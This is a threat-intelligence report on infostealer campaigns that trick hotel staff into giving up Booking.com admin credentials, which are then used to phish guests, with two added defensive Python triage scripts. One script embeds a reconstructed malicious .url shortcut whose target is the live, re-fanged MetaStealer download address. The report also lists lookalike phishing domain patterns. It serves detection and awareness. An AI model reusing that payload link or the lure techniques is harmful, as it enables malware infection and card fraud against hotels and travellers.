
In the second half of 2023, the hospitality industry was increasingly targeted by spam and social-engineering campaigns that delivered malware. The victims of these campaigns are threefold: customers who book through the platforms, property operators who manage their listings on the platforms and the booking platforms themselves. The campaigns are tailored to the routine exchanges hotels have with guests, such as sending identity documents. Unfortunately, these exchanges are prime opportunities for a classic bait-and-switch by threat actors, who substitute malware for the expected document.
These campaigns predominantly revolve around the Booking.com platform. The platform allows hotels and other property owners to list their properties. Property operators get their own administrative booking panel (accessed through admin.booking.com) to manage bookings. Cybercriminals seek access to these panels, as illicit access means opportunities to profit from fraud. We’ve seen rising demand for credentials for admin.booking.com. We track the trade in stolen login credentials across the underground and threat actors in our Credential Intelligence module, which collects datasets from information stealers (infostealers), instant messaging services, data breaches and more. In the last three months, we collected nearly 4,300 credential sets for admin.booking.com, which shows that there is a pervasive risk of account takeovers (ATOs).
Fraudsters get access to the booking portals by tricking property operators into running infostealer malware. Hotel staff and guests routinely exchange documents, and threat actors take advantage of this by sending malware to hotel staff under the guise of such documents. The infostealer harvests the login credentials saved on the staff member's machine and sends them to the fraudsters. Once inside the booking panel, the fraudsters can see every reservation stored in the platform and move on to the guests: they contact upcoming guests and ask for payment. Because these messages are sent through the real platform, they carry a veneer of legitimacy that makes victims far more likely to be fooled. We also observed a few instances where hotels were contacted directly through their own email addresses rather than through the platform's messaging, following the same approach. In this report, we examine these malware campaigns targeting the hotel industry.
[Image: Fig1]
To start the process of gaining unauthorized access to a hotel's administration portal, threat actors make a reservation. After receiving the booking confirmation, they reply to the automatic confirmation message to open a dialog with the hotel staff. When the hotel responds, the attackers send a carefully crafted follow-up email aimed at getting the staff member to follow a link. The link usually leads to a password-protected archive said to contain documents that back up the actor's earlier requests, such as copies of passports or medical records specifying dietary requirements. The password serves the attacker twice: it makes the request look like a privacy-conscious guest, and it prevents mail gateways and scanners from inspecting the archive's contents. Once the victim downloads the archive, enters the password supplied by the fraudster and runs the file inside, the infostealer is deployed on the endpoint and starts collecting sensitive data, including administrative credentials for admin.booking.com.
Over the course of several months, we observed the use of various infostealers in campaigns, including StealC, Lumma, AgentTesla, Arkei, Vidar and MetaStealer, which is an improved RedLine variant. To provide the most current and relevant information, we will give an example of a campaign involving MetaStealer.
Since the beginning of December 2023, there has been a noticeable increase in the deployment of MetaStealer. Here we examine a campaign from Jan. 6, 2024. The diagram below shows the general attack flow for these types of campaigns.
[Image: Fig2 - This image shows two examples of attack flows that start with emails sent to hotel staff that eventually lead to infostealer infections.]
In these scenarios, a threat actor assumed the role of a prospective hotel guest and contacted the hotel to make a reservation (see below). This approach marked a slight shift from the usual strategy of responding to Booking.com confirmation emails. Instead, the actor directly engaged with hotels via their official email channels.
[Image: Fig3 - This image shows a screenshot of email correspondence between the threat actor and the administrator of the hotel. (Source: @JAMESWT_MHT X account on Jan. 6, 2024.)]
In this campaign, once a response was received from the hotel administrator, the threat actor sent a follow-up email outlining their room preferences and dates and included a URL disguised as a portable document format (PDF) file (see screenshot below). When the recipient clicked on it, they were taken to the FileTransfer data-sharing platform, which hosted a file named “ID and Card for booking.pdf.url.download.” The name is a double-extension lure: the “.pdf” label is decoration, while “.url” marks a Windows Internet Shortcut, a small text file that makes Windows fetch whatever target it points to when opened. Opening this file downloaded “file.exe” from a web page hosted at hxxp://89[dot]23.99.252/pdf/file.exe. Executing that file then triggered the installation of MetaStealer.
[Image: Fig4 - This image shows a screenshot of email correspondence between the threat actor and the administrator of the hotel. (Source: @JAMESWT_MHT X account on Jan. 6, 2024)]
[Image: Fig5 - This image shows the FileTransfer data-sharing portal hosting the “ID and Card for booking.pdf.url.download.” (Source: @JAMESWT_MHT X account on Jan. 6, 2024)]
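The lure above can be triaged without ever opening it: the file name reveals the double extension, and a .url file is plain INI text whose URL= key names the remote target. The script below is an added example, not code from the original report or from any vendor tool. The shortcut body it parses is constructed (the report gives only the file name and the download location, which is re-fanged here purely so the parser can read it; nothing is fetched), and the extension lists are the author's own triage heuristics.

```python
"""Triage a Windows Internet Shortcut (.url) lure by its name and its target.

Added example; not from the original report. SAMPLE_URL_FILE is constructed
to mirror the published lure name and download location.
"""
import configparser
import re
from typing import Optional
from urllib.parse import urlparse

# Constructed sample. The report names the file and the payload URL; the
# shortcut body itself was not published, so this is an assumed reconstruction.
SAMPLE_NAME = "ID and Card for booking.pdf.url.download"
SAMPLE_URL_FILE = """[InternetShortcut]
URL=http://89.23.99.252/pdf/file.exe
IconIndex=0
"""

# Heuristic extension sets chosen for this example (not a complete list).
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png"}
EXECUTABLE_EXTS = {"exe", "scr", "msi", "bat", "cmd", "js", "vbs", "hta", "lnk"}


def name_findings(filename: str) -> list:
    """Flag a .url or executable extension hidden behind a document label."""
    # Sharing sites sometimes append ".download"; strip it before judging.
    name = re.sub(r"\.download$", "", filename, flags=re.IGNORECASE)
    exts = name.lower().split(".")[1:]
    findings = []
    if not exts:
        return findings
    last = exts[-1]
    if last == "url":
        findings.append("internet shortcut (.url): opening it fetches a remote target")
    elif last in EXECUTABLE_EXTS:
        findings.append(f"executable extension .{last}")
    if last in EXECUTABLE_EXTS | {"url"} and any(e in DOCUMENT_EXTS for e in exts[:-1]):
        findings.append("double extension: document label hides the real type")
    return findings


def shortcut_target(url_file_text: str) -> Optional[str]:
    """Return the URL= value of a .url body (INI format), or None if absent."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(url_file_text)
    return cp.get("InternetShortcut", "URL", fallback=None)


def target_findings(target: str) -> list:
    """Judge the shortcut target: scheme, host type and payload extension."""
    p = urlparse(target)
    findings = []
    if p.scheme == "http":
        findings.append("cleartext http download")
    if p.scheme == "file" or target.startswith("\\\\"):
        findings.append("file:// or UNC target (SMB/WebDAV fetch)")
    host = p.hostname or ""
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
        findings.append(f"bare IP address host {host}")
    last_segment = p.path.rsplit("/", 1)[-1]
    ext = last_segment.rsplit(".", 1)[-1].lower() if "." in last_segment else ""
    if ext in EXECUTABLE_EXTS:
        findings.append(f"remote executable payload .{ext}")
    return findings


def triage(filename: str, url_file_text: str) -> dict:
    """Combine name and target checks into a verdict a SOC analyst can act on."""
    target = shortcut_target(url_file_text)
    findings = name_findings(filename)
    if target:
        findings += target_findings(target)
    return {
        "target": target,
        "findings": findings,
        "verdict": "suspicious" if findings else "clean",
    }


if __name__ == "__main__":
    result = triage(SAMPLE_NAME, SAMPLE_URL_FILE)
    print(f"target : {result['target']}")
    print(f"verdict: {result['verdict']}")
    for finding in result["findings"]:
        print(" -", finding)
```

The same two checks map directly onto mail-gateway policy: quarantine attachments and shared-file names whose final extension is .url (or another executable type) when an earlier label claims a document type, and block shortcut targets that point at a bare IP or an executable.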
Once the threat actors receive the infostealer logs from the victim's system, they can log in to the hotel's reservation portal, such as admin.booking.com. This gives them visibility into every current room or holiday reservation made by customers.
The threat actors then progress to the next phase of the scheme: contacting those customers. Using email or the platform's official messaging, they pose as the hotel's administrators and ask guests to re-confirm the payment card details for their upcoming stay.
[Image: Fig6 - This image shows an example of a phishing message enticing a victim to enter their credit card details.]
These messages contain a link to a phishing page that mirrors the Booking.com interface. The page is pre-filled with the victim's exact personal details, including full name, stay dates and hotel, which the actor lifted from the compromised panel. The hostname is chosen to deceive further, following the “booking.id(numbers).com,” “booking.reserve-visit.com” or “booking.confirmat-id(number).com” pattern: the brand appears as the leftmost label, but the registered domain is the attacker's. Card details entered on these pages go straight to the threat actors.
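The three hostname patterns quoted above share one tell: “booking” is a subdomain label, while the registrable domain is not booking.com. The script below is an added example, not code from the original report, showing how to flag that in URLs pulled from mail or proxy logs. The log lines are constructed; the explicit patterns are the ones the report lists, and the generic brand-in-subdomain check is the author's heuristic. The registrable-domain helper takes the last two labels, which is correct for .com (the case here) but would need a public-suffix list for suffixes such as co.uk.

```python
"""Flag Booking.com lookalike hostnames in URLs found in logs.

Added example; not from the original report. LOG is constructed sample data.
"""
import re
from urllib.parse import urlparse

LEGIT_DOMAINS = {"booking.com"}

# The patterns quoted in the report, kept explicit so a hit says which matched.
KNOWN_LURE_PATTERNS = [
    re.compile(r"^booking\.id\d+\.com$"),
    re.compile(r"^booking\.reserve-visit\.com$"),
    re.compile(r"^booking\.confirmat-id\d+\.com$"),
]


def registrable_domain(host: str) -> str:
    """Last two labels. Adequate for .com; use a public-suffix list otherwise."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify(url: str) -> str:
    """Return legitimate / known-lure-pattern / brand-in-subdomain / unrelated."""
    host = (urlparse(url).hostname or "").lower()
    if not host:
        return "no-host"
    if registrable_domain(host) in LEGIT_DOMAINS:
        return "legitimate"          # booking.com and any real subdomain of it
    for pat in KNOWN_LURE_PATTERNS:
        if pat.match(host):
            return "known-lure-pattern"
    # Generic heuristic: the brand name appears in a label to the left of the
    # registrable domain (e.g. booking.com.evil.example, secure-booking.x.com).
    subdomain_labels = host.split(".")[:-2]
    if any("booking" in label for label in subdomain_labels):
        return "brand-in-subdomain"
    return "unrelated"


# Constructed proxy-style log lines; only the url= field is used.
LOG = """\
2024-01-08T09:12:03Z user=frontdesk url=https://admin.booking.com/hotel/hoteladmin/
2024-01-08T10:41:55Z user=guest17 url=https://booking.id83921.com/confirm?ref=2200
2024-01-08T11:02:17Z user=guest22 url=https://booking.reserve-visit.com/pay
2024-01-08T11:30:40Z user=guest09 url=http://booking.confirmat-id4471.com/checkout
2024-01-08T12:00:01Z user=guest31 url=https://secure-booking.example-hotel.com/login
2024-01-08T12:14:09Z user=guest31 url=https://www.example.org/
"""


def scan_log(text: str) -> list:
    """Return (url, verdict) pairs for every line that is neither legitimate nor unrelated."""
    hits = []
    for line in text.splitlines():
        m = re.search(r"url=(\S+)", line)
        if not m:
            continue
        verdict = classify(m.group(1))
        if verdict not in ("legitimate", "unrelated"):
            hits.append((m.group(1), verdict))
    return hits


if __name__ == "__main__":
    for url, verdict in scan_log(LOG):
        print(f"{verdict:20} {url}")
```

The explicit patterns catch this campaign; the subdomain heuristic is what survives the attacker's next domain registration, so keep both and route brand-in-subdomain hits to review rather than auto-block.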
Amid the complex cyber threats facing the hospitality industry, especially those involving platforms such as Booking.com, it is imperative for both industry professionals and customers to implement strong security practices. Here are some key recommendations for hospitality sector professionals and customers using services such as the Booking.com platform.
For hospitality sector professionals:
For customers using services such as Booking.com: